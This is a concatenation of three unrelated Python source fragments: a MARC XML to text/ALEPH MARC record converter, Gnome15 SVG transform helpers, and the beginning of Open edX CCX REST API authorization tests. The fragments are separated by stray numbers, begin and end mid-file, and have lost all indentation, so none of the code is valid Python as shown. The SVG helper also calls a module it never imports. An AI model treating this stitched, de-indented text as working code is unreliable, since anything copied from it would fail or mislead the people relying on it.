fieldname_changes = get_fieldname_changes()
else:
fieldname_changes = {}
if options["aleph-marc"] == 1:
## Perform some ALEPH-MARC specific tasks:
## Assume that we will NOT display "001":
display_001 = 0
## Add ALEPH record headers to the output record:
if 1 not in (options["correct-mode"], options["append-mode"]):
## This is not an ALEPH "correct" or "append" record. The
## record must therefore have FMT and LDR fields. E.g.:
## 123456789 FMT L BK
## 123456789 LDR L ^^^^^nam^^22^^^^^^a^4500
out += """%(sys)s%(fmt)s
%(sys)s%(ldr)s\n""" % { 'sys' : sysno,
'fmt' : get_aleph_FMT(),
'ldr' : get_aleph_LDR()
}
if options["delete-mode"] == 1:
## This is an ALEPH 'delete' record. Add the DEL field
## then return the 'completed' record (in delete mode,
## the record only needs the leaders, and a 'DEL' field, e.g.:
## 123456789 FMT L BK
## 123456789 LDR L ^^^^^nam^^22^^^^^^a^4500
## 123456789 DEL L $$aY
out += """%(sys)s%(del)s\n""" % { 'sys' : sysno,
'del' : get_aleph_DEL()
}
return out
elif 1 in (options["insert-mode"], options["replace-mode"]):
## Either an ALEPH 'insert' or 'replace' record is being created.
## It needs to have 008 and OWN fields. E.g.:
## 123456789 008 L ^^^^^^s^^^^^^^^^^^^^^^^r^^^^^000^0^eng^d
## 123456789 OWN L $$aPUBLIC
out += """%(sys)s%(008)s\n""" % { 'sys' : sysno,
'008' : get_aleph_008()
}
## The "OWN" field should only be printed at this level if the
## MARC XML did not have an OWN (963__a) field:
if "PUBLIC" not in \
record_get_field_values(record, "963", code="a"):
## Add OWN field:
out += """%(sys)s%(own)s\n""" % { 'sys' : sysno,
'own' : get_aleph_OWN() }
if options["replace-mode"] == 1:
## In 'replace' mode, the record should have a 001 field:
display_001 = 1
## Remove fields unwanted in ALEPH MARC:
for deltag in get_fields_dropped_in_aleph():
try:
del record[deltag]
except KeyError:
## tag doesn't exist in record:
pass
## now add 001, since it is a special field:
if options["text-marc"] == 1:
try:
## get the 001 line(s):
lines_001 = create_field_lines(fieldname="001", \
field=record["001"][0], \
sysno=sysno, \
alephmarc=options["aleph-marc"])
## print the 001 line(s):
out += print_field(field_lines=lines_001, \
alephmarc=options["aleph-marc"])
except KeyError:
## no 001 field
pass
elif options["aleph-marc"] == 1:
## If desirable, build the "001" line:
if display_001 == 1:
try:
## make the 001 line(s):
line_leader = """%(sys)s """ % { 'sys' : sysno }
line_leader += """%(fieldname)s L """ % { 'fieldname' : "001" }
lines_001 = [[["", line_leader], ["", sysno]]]
## print the 001 line(s):
out += print_field(field_lines=lines_001, \
alephmarc=options["aleph-marc"])
except KeyError:
## no 001 field
pass
## Now, if running in "insert" or "replace" mode, add "003":
## 003 is a mandatory field in an ALEPH record. It contains the
## identifier for the organization that has generated the SYS (001)
## for the record. As such, it is necessary to drop any existing 003
## from the record, then add our own 003.
## First, drop the "003" field from the record:
try:
del record["003"]
except KeyError:
## There was no 003
pass
## Now add a correct 003 (if desirable):
if 1 in (options["insert-mode"], options["replace-mode"]):
out += """%(sys)s%(own)s\n""" % { 'sys' : sysno,
'own' : get_aleph_003() }
## delete 001 from the list of fields to output (if it exists):
try:
del record["001"]
except KeyError:
## There was no 001
pass
## Get the fields of this record, and order them correctly (using the same
## order as that of the original MARC XML file):
fields = []
for tag in record.keys():
for field in record[tag]:
fields.append((tag, field))
record_order_fields(fields)
## Finally, loop through all fields and display them in the record:
for field in fields:
## Should the field-name be changed?
try:
fieldname = fieldname_changes[str(field[0])]
except KeyError:
## Don't change this fieldname:
fieldname = field[0]
## get the subfields, etc, for this field:
fielddata = field[1]
## Create the MARC lines for this field:
field_lines = create_field_lines(fieldname, \
fielddata, \
sysno, \
options["aleph-marc"])
## Now create the formatted MARC lines:
out += print_field(field_lines, options["aleph-marc"])
## Return the formatted MARC record:
return out
def print_field(field_lines, alephmarc=0):
"""Create the lines of a record relating to a given field,
and return these lines as a string.
@param field_lines: A list of lists, whereby each item in
the top-level list is an instance of a field
(e.g. a "datafield" or "controlfield").
@param alephmarc: an integer flag to tell the function whether
or not the record being created is a pure text MARC
record, or an ALEPH MARC record.
@return: A string containing the record lines for the given field
"""
if type(field_lines) not in (list, tuple):
return ""
out = ""
if alephmarc == 0:
## creating a text-marc record
for line in field_lines:
## create line in text-marc mode:
for segment in line:
segment[1] = segment[1].replace(" \n", " ")
segment[1] = segment[1].replace("\n", " ")
out += "%(code)s%(value)s" % { 'code' : segment[0],
'value' : segment[1] }
out += "\n"
else:
## creating an aleph-marc record
for line in field_lines:
cur_line_len = 0
glue_count = 0
num_linesegments = len(line)
if num_linesegments > 1:
line_leader_len = len(line[0][1])
printable_line = ""
i = 1
while i < num_linesegments:
line[i][1] = line[i][1].replace(" \n", " ")
line[i][1] = line[i][1].replace("\n", " ")
cur_segment_len = len(line[i][0]) + len(line[i][1])
if (line_leader_len + cur_line_len + cur_segment_len + 2 \
+ len(str(glue_count))) > (CFG_MAXLEN_ALEPH_LINE - 25):
## adding this segment makes the line too long. It
## must be printed now with the ALEPH $$9 glue.
## How much of the current line can be printed?
space_remaining = (CFG_MAXLEN_ALEPH_LINE - 25) - \
(line_leader_len + cur_line_len + 3) \
- len(line[i][0])
if space_remaining > 0:
## there is space to add some of this line
printable_line += line[i][0] + \
line[i][1][0:space_remaining]
line[i][1] = line[i][1][space_remaining:]
## print this line:
out += """%(sys)s$$9%(glue_count)s""" \
"""%(printable_line)s\n""" \
% { 'sys' : line[0][1],
'glue_count' : str(glue_count),
'printable_line' : printable_line,
}
## update glue count, and reset printable line
glue_count += 1
printable_line = ""
cur_line_len = 0
else:
## Including this line segment, the line fits within a
## maximum line length, so add it:
printable_line += line[i][0] + line[i][1]
cur_line_len += (len(line[i][0]) + len(line[i][1]))
i += 1
## Now add to the display string, any of the line
## that remains in printable line:
if len(printable_line) > 0:
if glue_count > 0:
out += """%(sys)s$$9%(glue_count)s""" \
"""%(printable_line)s\n""" \
% { 'sys' : line[0][1],
'glue_count' : str(glue_count),
'printable_line' : printable_line
}
else:
out += """%(sys)s%(printable_line)s\n""" \
% { 'sys' : line[0][1],
'printable_line' : printable_line
}
elif num_linesegments == 1:
## strange - only a SYS?
out += "%(sys)s\n" % { 'sys' : line[0][1] }
return out
def create_field_lines(fieldname, field, sysno, alephmarc=0):
"""From the internal representation of a field, as pulled from
a record created by bibrecord, create a list of lists
whereby each item in the top-level list represents a record
line that should be created for the field, and each sublist
represents the various components that make up that line
(sysno, line label, subfields, etc...)
@param fieldname: the name for the field (e.g. 001) - string
@param field: the internal representation of the field, as
created by bibrecord - list
@param sysno: the system number to be used for the created
field - string
@param alephmarc: a flag telling the function whether a pure
text MARC or an ALEPH MARC record is being created - int
@return: list, containing the details of the created field
lines
"""
field_lines = []
field_instance_line_segments = []
out = """%(sys)s """ % { 'sys' : sysno }
out += """%(fieldname)s""" % { 'fieldname' : fieldname }
if alephmarc != 0:
## aleph marc record - format indicators properly:
out += """%(ind1)s%(ind2)s L """ \
% {
'ind1' : (field[1] not in ("", " ") and field[1]) \
or ((field[2] not in ("", " ") and "_") or (" ")),
'ind2' : (field[2] not in ("", " ") and field[2]) or (" ")
}
else:
## text marc record - when empty, indicators should appear as unserscores:
out += """%(ind1)s%(ind2)s """ \
% {
'ind1' : (field[1] not in ("", " ") and field[1]) or ("_"),
'ind2' : (field[2] not in ("", " ") and field[2]) or ("_"),
}
## append field label to line segments list:
field_instance_line_segments.append(["", out])
## now, loop through the subfields (or controlfield data) and
## add each of them to the line data
subfield_label = ""
subfield_value = ""
if len(field[0]) == 0 and field[3] != "":
## this is a controlfield
if fieldname not in ("001", "002", "003", "004", \
"005", "006", "007", "008", "009"):
subfield_label = "$$_"
else:
subfield_label = ""
subfield_value = "%(subfield_value)s" % { 'subfield_value' : field[3] }
field_instance_line_segments.append([subfield_label, subfield_value])
else:
## this should be a datafield:
for subfield in field[0]:
subfield_label = """$$%(subfield_code)s""" \
% { 'subfield_code' : subfield[0] }
subfield_value = """%(subfield_value)s""" \
% { 'subfield_value' : subfield[1] }
field_instance_line_segments.append([subfield_label, \
subfield_value])
field_lines.append(field_instance_line_segments)
return field_lines
def get_sysno_from_record(record, options):
"""Function to get the system number for a record.
In the case of a pure text MARC record being created, the
sysno will be retrieved from 001 (i.e. the 'recid' will be returned).
In the case of an Aleph MARC record being created, the sysno
will be retrieved from 970__a IF this field exists. If not,
None will be returned.
@param record: the internal representation of the record
(created by bibrecord) from which the sysno is to be retrieved.
@param options: various options about the record to be created,
as obtained from the command line.
@return: a string containing a 9-digit SYSNO, -OR- None in
certain cases for an Aleph MARC record.
"""
if options["text-marc"] != 0:
vals001 = record_get_field_values(rec=record, tag="001")
if len(vals001) > 1:
## multiple values for recid is illegal!
sysno = None
elif len(vals001) < 1:
## no value for recid is illegal!
sysno = None
else:
## get recid
sysno = vals001[0]
if len(sysno) < 9:
sysno = "0"*(9-len(sysno)) + sysno
else:
vals970a = record_get_field_values(rec=record, tag="970", code="a")
if len(vals970a) > 1:
## multiple SYS is illegal - return a list of them all,
## let other functions decide what to do
return vals970a
if len(vals970a) < 1:
## no SYS
sysno = None
else:
## get SYS
sysno = vals970a[0][0:9]
return sysno
def recxml2recmarc(xmltext, options, sysno_generator=get_sysno_generator()):
"""The function that processes creating the records from
an XML string, and prints these records to the
standard output stream.
@param xmltext: An XML MARC record in string form.
@param options: Various options about the record to be
created, as passed from the command line.
@param sysno_generator: A static parameter to act as an Aleph
system number generator. Do not provide a value for this - it
will be assigned upon first call to this function.
"""
rec_count = 0 ## Counter used to record the number of the rec
## that is being processed. Used in error messages
## for the user, when a record cannot be processed
## create internal records structure from xmltext:
records = create_records(xmltext, 1, 1)
## now loop through each record, get its sysno, and convert it:
for rec_tuple in records:
rec_count += 1
## Get the record-dictionary itself from the record-tuple:
record = rec_tuple[0]
if record is None:
## if the record is None, there was probably a problem
## with the MARC XML. Display a warning message on stderr and
## move past this record:
sys.stderr.write("E: Unable to process record number %s; The XML " \
" may be broken for this record.\n" \
% str(rec_count))
continue
## From the record, get the SYS if running in ALEPH-MARC mode, or
## the recid (001) if running in TEXT-MARC mode:
sysno = get_sysno_from_record(record, options)
if sysno is None:
## No 'sysno' was found in the record:
if options["text-marc"] == 1:
## 'sysno' (001) (which is actually the recid) is mandatory
## for the creation of TEXT-MARC. Report the error and skip
## past the record:
sys.stderr.write("E: Record number %s has no 'recid' (001). " \
"This field is mandatory for the " \
"creation of TEXT MARC. The record has been " \
"skipped.\n" % str(rec_count))
continue
elif options["aleph-marc"] == 1 and \
1 in (options["append-mode"], options["delete-mode"], \
options["correct-mode"], options["replace-mode"]):
## When creating ALEPH-MARC that will be used to manipulate
## a record in some way (i.e. correct, append, delete, replace),
## the ALEPH SYS (970__a in MARC XML) is mandatory. Report the
## error and skip past the record:
sys.stderr.write("E: Record number %s has no ALEPH 'SYS' " \
"(970__a). This field is mandatory for the " \
"creation of ALEPH MARC that is used for the" \
" manipulation of records (i.e. replace, " \
"correct, append, delete). The record has " \
"been skipped.\n" % str(rec_count))
continue
elif options["aleph-marc"] == 1 and type(sysno) in (list, tuple):
## multiple values for SYS (970__a) in ALEPH-MARC mode are not
## permitted. Report the error and skip past the record:
sys.stderr.write("E: Multiple values have been found for the " \
"ALEPH SYS (970__a) in record number %s. This " \
"is not permitted when running in ALEPH-MARC " \
"mode. The record has been skipped." \
% str(rec_count))
continue
if options["aleph-marc"] == 1 and options["insert-mode"] == 1:
## Creating an ALEPH "insert" record. Since the resulting record
## should be treated as a new insert into ALEPH, any 'sysno' that
## may have been found in the MARC XML record cannot be used -
## that would be dangerous. Therefore, set 'sysno' to None and
## create a random sysno:
sysno = None
try:
sysno = sysno_generator.next()
except StopIteration:
## generator counter has overstepped the MAX ALEPH SYS!
## Without a SYS, we cannot create ALEPH MARC
sys.stderr.write("""E: Maximum ALEPH SYS has been """ \
"""reached - unable to continue.\n""")
sys.exit(1)
## No problems were encountered with SYS or recid. Display the
## translated record:
rec_out = create_marc_record(record, sysno, options)
sys.stdout.write(rec_out)
sys.stdout.flush()
def usage(exitcode=1, wmsg=""):
"""Prints usage info."""
if wmsg:
sys.stderr.write("Error: %s.\n" % wmsg)
sys.stderr.write ("""\
Usage: %s [options] marcxml_record_file
Convert an XML MARC record file to text MARC; Print to standard output stream
Command options:
--text-marc \t\t\tProduce text MARC output (default)
--aleph-marc=[a, d, i, c, r] \tProduce a ALEPH MARC output
When running in --aleph-marc mode, provide one of the following values:
\ta \t\t\t\tCreate an ALEPH "append" record
\td \t\t\t\tCreate an ALEPH "delete" record
\ti \t\t\t\tCreate an ALEPH "insert" record
\tc \t\t\t\tCreate an ALEPH "correct" record
\tr \t\t\t\tCreate an ALEPH "replace" record
General options:
-h, --help \t\t\t Print this help.
-V, --version\t\t\t Print version information.
""" % (basename(sys.argv[0]),))
sys.exit(exitcode)
def get_cli_options():
"""Get the various arguments and options from the command line and populate
a dictionary of cli_options.
@return: (tuple) of 2 elements. First element is a dictionary of cli
options and flags, set as appropriate; Second element is a list of cli
arguments.
"""
try:
opts, args = getopt.getopt(sys.argv[1:], "hV", [
"help", "version", "text-marc", "aleph-marc="])
except getopt.GetoptError, err:
usage(1, err)
options = { "append-mode" : 0,
"insert-mode" : 0,
"delete-mode" : 0,
"replace-mode" : 0,
"correct-mode" : 0,
"aleph-marc" : 0,
"text-marc" : 0
}
for opt, arg in opts:
if opt in ["-h", "--help"]:
## Display usage (help) message and exit successfully:
usage(0)
elif opt in ["-V", "--version"]:
## Display version on stdout and exit successfully:
sys.stdout.write("%s\n" % __revision__)
sys.exit(0)
elif opt == "--aleph-marc":
## Running in ALEPH-MARC mode:
options["aleph-marc"] = 1
if arg == "a":
## Create an ALEPH "APPEND" record:
options["append-mode"] = 1
elif arg == "d":
## Create an ALEPH "DELETE" record:
options["delete-mode"] = 1
elif arg == "i":
## Create an ALEPH "INSERT" record:
options["insert-mode"] = 1
elif arg == "c":
## Create an ALEPH "CORRECT" record:
options["correct-mode"] = 1
elif arg == "r":
## Create an ALEPH "REPLACE" record:
options["replace-mode"] = 1
else:
## Invalid option for ALEPH-MARC mode.
## Display usage (help) message and exit with failure:
usage(1)
elif opt == "--text-marc":
## Running in TEXT-MARC mode:
options["text-marc"] = 1
else:
## Invalid option. Display an error message to the user,
## display usage (help) message, and exit with failure:
sys.stderr.write("Bad option, %s\n" % opt)
usage(1)
if options["aleph-marc"] + options["text-marc"] > 1:
## User has specified both ALEPH-MARC and TEXT-MARC modes.
## This is not permitted, display error message, usage message, and
## exit with failure:
err_msg = "Choose either aleph-marc mode or text-marc mode - not both."
usage(1, err_msg)
elif options["aleph-marc"] + options["text-marc"] == 0:
## User has not specified whether to run in ALEPH-MARC or TEXT-MARC
## mode. Run in the default TEXT-MARC mode.
options["text-marc"] = 1
if options["aleph-marc"] == 1:
## Running in ALEPH-MARC mode. Conduct some final ALEPH-MODE-specific
## checks:
if options["append-mode"] + options["insert-mode"] \
+ options["delete-mode"] + options["replace-mode"] \
+ options["correct-mode"] != 1:
## Invalid option for ALEPH-MARC mode.
## Display error message, usage info, and exit with failure.
err_msg = "A valid mode must be supplied for aleph-marc"
usage(1, err_msg)
if 1 in (options["insert-mode"], options["replace-mode"]) and \
CFG_ORGANIZATION_IDENTIFIER.strip() == "":
## It is ILLEGAL to create an ALEPH-MARC mode INSERT or
## REPLACE record if the organization's identifier is not known.
## Write out an error mesage and exit with failure.
sys.stderr.write("Error: ***CFG_ORGANIZATION_IDENTIFIER IS NOT " \
"SET!*** Unable to create ALEPH INSERT or " \
"REPLACE records. Please inform your %s" \
" Administrator.\n" % CFG_SITE_NAME)
sys.exit(1)
## Check that a filename for the MARC XML file was provided:
if len(args) == 0:
## No arguments, therefore no XML file. Display a
## usage message, and exit with failure:
err_msg = ""
usage(1)
return (options, args)
def main():
"""Main function."""
## process CLI options/arguments:
(options, args) = get_cli_options()
## Read in the XML file and process it:
xmlfile = args[0]
## open file:
try:
xmltext = open(xmlfile, 'r').read()
except IOError:
sys.stderr.write("Error: File %s not found.\n\n" % xmlfile)
usage(1)
## Process record conversion:
recxml2recmarc(xmltext=xmltext, options=options)
| 0.010184 |
# Gnome15 - Suite of tools for the Logitech G series keyboards and headsets
# Copyright (C) 2010 Brett Smith <[email protected]>
# Copyright (C) 2013 Nuno Araujo <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
SVG utilities
'''
import cairo
import g15pythonlang
# Logging
import logging
logger = logging.getLogger(__name__)
def rotate_element(element, degrees):
transforms = get_transforms(element)
if len(transforms) > 0:
t = transforms[0]
for i in range(1, len(transforms)):
t = t.multiply(transforms[i])
else:
t = cairo.Matrix()
t.rotate(g15convert.degrees_to_radians(degrees))
ts = "m" + str(t)[7:]
element.set("transform", ts)
def get_transforms(element, position_only = False):
transform_val = element.get("transform")
list = []
if transform_val != None:
start = 0
while True:
start_args = transform_val.find("(", start)
if start_args == -1:
break
name = transform_val[:start_args].lstrip()
end_args = transform_val.find(")", start_args)
if end_args == -1:
break
args = transform_val[start_args + 1:end_args].split(",")
if name == "translate":
list.append(cairo.Matrix(1.0, 0.0, 0.0, 1.0, float(args[0]), float(args[1])))
elif name == "matrix":
if position_only:
list.append(cairo.Matrix(float(args[0]), float(args[1]), float(args[2]), float(args[3]),float(args[4]),float(args[5])))
else:
list.append(cairo.Matrix(1, 0, 0, 1, float(args[4]),float(args[5])))
elif name == "scale":
list.append(cairo.Matrix(float(args[0]), 0.0, 0.0, float(args[1]), 0.0, 0.0))
else:
logger.warning("Unsupported transform %s", name)
start = end_args + 1
return list
def get_location(element):
list = []
while element != None:
x = element.get("x")
y = element.get("y")
if x != None and y != None:
list.append((float(x), float(y)))
transform_val = element.get("transform")
if transform_val != None:
start = 0
while True:
start_args = transform_val.find("(", start)
if start_args == -1:
break
name = transform_val[:start_args].lstrip()
end_args = transform_val.find(")", start_args)
if end_args == -1:
logger.warning("Unexpected end of transform arguments")
break
args = g15pythonlang.split_args(transform_val[start_args + 1:end_args])
if name == "translate":
list.append((float(args[0]), float(args[1])))
elif name == "matrix":
list.append((float(args[4]),float(args[5])))
else:
logger.warning("WARNING: Unsupported transform %s", name)
start = end_args + 1
element = element.getparent()
list.reverse()
x = 0
y = 0
for i in list:
x += i[0]
y += i[1]
return (x, y)
def get_actual_bounds(element, relative_to = None):
id = element.get("id")
bounds = get_bounds(element)
transforms = []
t = cairo.Matrix()
t.translate(bounds[0],bounds[1])
transforms.append(t)
# If the element is a clip path and the associated clipped_node is provided, the work out the transforms from
# the parent of the clipped_node, not the clip itself
if relative_to is not None:
element = relative_to.getparent()
while element != None:
transforms += get_transforms(element, position_only=True)
element = element.getparent()
transforms.reverse()
if len(transforms) > 0:
t = transforms[0]
for i in range(1, len(transforms)):
t = t.multiply(transforms[i])
xx, yx, xy, yy, x0, y0 = t
return x0, y0, bounds[2], bounds[3]
def get_bounds(element):
x = 0.0
y = 0.0
w = 0.0
h = 0.0
v = element.get("x")
if v != None:
x = float(v)
v = element.get("y")
if v != None:
y = float(v)
v = element.get("width")
if v != None:
w = float(v)
v = element.get("height")
if v != None:
h = float(v)
return (x, y, w, h)
| 0.006098 |
"""
Tests for the CCX REST APIs.
"""
import json
import math
import string
import urllib
import urlparse
from datetime import timedelta
from itertools import izip
import ddt
import mock
from ccx_keys.locator import CCXLocator
from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import Resolver404, resolve, reverse
from django.utils.timezone import now
from nose.plugins.attrib import attr
from oauth2_provider import models as dot_models
from opaque_keys.edx.keys import CourseKey
from provider.constants import CONFIDENTIAL
from provider.oauth2.models import Client, Grant
from rest_framework import status
from rest_framework.test import APITestCase
from courseware import courses
from lms.djangoapps.ccx.api.v0 import views
from lms.djangoapps.ccx.models import CcxFieldOverride, CustomCourseForEdX
from lms.djangoapps.ccx.overrides import override_field_for_ccx
from lms.djangoapps.ccx.tests.utils import CcxTestCase
from lms.djangoapps.ccx.utils import ccx_course as ccx_course_cm
from lms.djangoapps.ccx.utils import get_course_chapters
from lms.djangoapps.instructor.access import allow_access, list_with_level
from lms.djangoapps.instructor.enrollment import enroll_email, get_email_params
from student.models import CourseEnrollment
from student.roles import CourseCcxCoachRole, CourseInstructorRole, CourseStaffRole
from student.tests.factories import AdminFactory, UserFactory
USER_PASSWORD = 'test'
AUTH_ATTRS = ('auth', 'auth_header_oauth2_provider')
class CcxRestApiTest(CcxTestCase, APITestCase):
"""
Base class with common methods to be used in the test classes of this module
"""
@classmethod
def setUpClass(cls):
super(CcxRestApiTest, cls).setUpClass()
def setUp(self):
"""
Set up tests
"""
super(CcxRestApiTest, self).setUp()
# add some info about the course for easy access
self.master_course_key = self.course.location.course_key
self.master_course_key_str = unicode(self.master_course_key)
# OAUTH2 setup
# create a specific user for the application
self.app_user = app_user = UserFactory(
username='test_app_user',
email='[email protected]',
password=USER_PASSWORD
)
# add staff role to the app user
CourseStaffRole(self.master_course_key).add_users(app_user)
# adding instructor to master course.
instructor = UserFactory()
allow_access(self.course, instructor, 'instructor')
# FIXME: Testing for multiple authentication types in multiple test cases is overkill. Stop it!
self.auth, self.auth_header_oauth2_provider = self.prepare_auth_token(app_user)
self.course.enable_ccx = True
self.mstore.update_item(self.course, self.coach.id)
# making the master course chapters easily available
self.master_course_chapters = get_course_chapters(self.master_course_key)
def get_auth_token(self, app_grant, app_client):
"""
Helper method to get the oauth token
"""
token_data = {
'grant_type': 'authorization_code',
'code': app_grant.code,
'client_id': app_client.client_id,
'client_secret': app_client.client_secret
}
token_resp = self.client.post(reverse('oauth2:access_token'), data=token_data, format='multipart')
self.assertEqual(token_resp.status_code, status.HTTP_200_OK)
token_resp_json = json.loads(token_resp.content)
return '{token_type} {token}'.format(
token_type=token_resp_json['token_type'],
token=token_resp_json['access_token']
)
def prepare_auth_token(self, user):
"""
creates auth token for users
"""
# create an oauth client app entry
app_client = Client.objects.create(
user=user,
name='test client',
url='http://localhost//',
redirect_uri='http://localhost//',
client_type=CONFIDENTIAL
)
# create an authorization code
app_grant = Grant.objects.create(
user=user,
client=app_client,
redirect_uri='http://localhost//'
)
# create an oauth2 provider client app entry
app_client_oauth2_provider = dot_models.Application.objects.create(
name='test client 2',
user=user,
client_type='confidential',
authorization_grant_type='authorization-code',
redirect_uris='http://localhost:8079/complete/edxorg/'
)
# create an authorization code
auth_oauth2_provider = dot_models.AccessToken.objects.create(
user=user,
application=app_client_oauth2_provider,
expires=now() + timedelta(weeks=1),
scope='read write',
token='16MGyP3OaQYHmpT1lK7Q6MMNAZsjwF'
)
auth_header_oauth2_provider = "Bearer {0}".format(auth_oauth2_provider)
auth = self.get_auth_token(app_grant, app_client)
return auth, auth_header_oauth2_provider
def expect_error(self, http_code, error_code_str, resp_obj):
"""
Helper function that checks that the response object
has a body with the provided error
"""
self.assertEqual(resp_obj.status_code, http_code)
self.assertIn('error_code', resp_obj.data)
self.assertEqual(resp_obj.data['error_code'], error_code_str)
def expect_error_fields(self, expected_field_errors, resp_obj):
"""
Helper function that checks that the response object
has a body with the provided field errors
"""
self.assertEqual(resp_obj.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('field_errors', resp_obj.data)
# restructure the error dictionary for a easier comparison
resp_dict_error = {}
for field_name, error_dict in resp_obj.data['field_errors'].iteritems():
resp_dict_error[field_name] = error_dict.get('error_code', '')
self.assertEqual(expected_field_errors, resp_dict_error)
@attr(shard=1)
@ddt.ddt
class CcxListTest(CcxRestApiTest):
"""
Test for the CCX REST APIs
"""
ENABLED_SIGNALS = ['course_published']
@classmethod
def setUpClass(cls):
super(CcxListTest, cls).setUpClass()
def setUp(self):
"""
Set up tests
"""
super(CcxListTest, self).setUp()
self.list_url = reverse('ccx_api:v0:ccx:list')
self.list_url_master_course = urlparse.urljoin(
self.list_url,
'?master_course_id={0}'.format(urllib.quote_plus(self.master_course_key_str))
)
@ddt.data(*AUTH_ATTRS)
def test_authorization(self, auth_attr):
"""
Test that only the right token is authorized
"""
auth_list = [
"Wrong token-type-obviously",
"Bearer wrong token format",
"Bearer wrong-token",
"Bearer",
"Bearer hfbhfbfwq398248fnid939rh3489fh39nd4m34r9" # made up token
]
# all the auths in the list fail to authorize
for auth in auth_list:
resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=auth)
self.assertEqual(resp.status_code, status.HTTP_401_UNAUTHORIZED)
resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
def test_authorization_no_oauth_staff(self):
"""
Check authorization for staff users logged in without oauth
"""
# create a staff user
staff_user = UserFactory(
username='test_staff_user',
email='[email protected]',
password=USER_PASSWORD
)
# add staff role to the staff user
CourseStaffRole(self.master_course_key).add_users(staff_user)
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email
}
# the staff user can perform the request
self.client.login(username=staff_user.username, password=USER_PASSWORD)
resp = self.client.get(self.list_url_master_course)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.client.post(self.list_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
def test_authorization_no_oauth_instructor(self):
"""
Check authorization for instructor users logged in without oauth
"""
# create an instructor user
instructor_user = UserFactory(
username='test_instructor_user', email='[email protected]', password=USER_PASSWORD
)
# add instructor role to the instructor user
CourseInstructorRole(self.master_course_key).add_users(instructor_user)
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email
}
# the instructor user can perform the request
self.client.login(username=instructor_user.username, password=USER_PASSWORD)
resp = self.client.get(self.list_url_master_course)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.client.post(self.list_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
def test_authorization_no_oauth(self):
"""
Check authorization for coach users logged in without oauth
"""
# create an coach user
coach_user = UserFactory(
username='test_coach_user', email='[email protected]', password=USER_PASSWORD
)
# add coach role to the coach user
CourseCcxCoachRole(self.master_course_key).add_users(coach_user)
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email
}
# the coach user cannot perform the request: this type of user can only get her own CCX
self.client.login(username=coach_user.username, password=USER_PASSWORD)
resp = self.client.get(self.list_url_master_course)
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
resp = self.client.post(self.list_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
@ddt.data(*AUTH_ATTRS)
def test_get_list_wrong_master_course(self, auth_attr):
"""
Test for various get requests with wrong master course string
"""
# mock the permission class these cases can be tested
mock_class_str = 'openedx.core.lib.api.permissions.IsMasterCourseStaffInstructor.has_permission'
with mock.patch(mock_class_str, autospec=True) as mocked_perm_class:
mocked_perm_class.return_value = True
# case with no master_course_id provided
resp = self.client.get(self.list_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'master_course_id_not_provided', resp)
base_url = urlparse.urljoin(self.list_url, '?master_course_id=')
# case with empty master_course_id
resp = self.client.get(base_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_id_not_valid', resp)
# case with invalid master_course_id
url = '{0}invalid_master_course_str'.format(base_url)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_id_not_valid', resp)
# case with inexistent master_course_id
url = '{0}course-v1%3Aorg_foo.0%2Bcourse_bar_0%2BRun_0'.format(base_url)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_404_NOT_FOUND, 'course_id_does_not_exist', resp)
@ddt.data(*AUTH_ATTRS)
def test_get_list(self, auth_attr):
"""
Tests the API to get a list of CCX Courses
"""
# there are no CCX courses
resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertIn('count', resp.data) # pylint: disable=no-member
self.assertEqual(resp.data['count'], 0) # pylint: disable=no-member
# create few ccx courses
num_ccx = 10
for _ in xrange(num_ccx):
self.make_ccx()
resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertIn('count', resp.data) # pylint: disable=no-member
self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member
self.assertIn('results', resp.data) # pylint: disable=no-member
self.assertEqual(len(resp.data['results']), num_ccx) # pylint: disable=no-member
@ddt.data(*AUTH_ATTRS)
def test_get_sorted_list(self, auth_attr):
"""
Tests the API to get a sorted list of CCX Courses
"""
# create few ccx courses
num_ccx = 3
for _ in xrange(num_ccx):
self.make_ccx()
# update the display_name fields
all_ccx = CustomCourseForEdX.objects.all()
all_ccx = all_ccx.order_by('id')
self.assertEqual(len(all_ccx), num_ccx)
title_str = 'Title CCX {0}'
for num, ccx in enumerate(all_ccx):
ccx.display_name = title_str.format(string.ascii_lowercase[-(num + 1)])
ccx.save()
# sort by display name
url = '{0}&order_by=display_name'.format(self.list_url_master_course)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
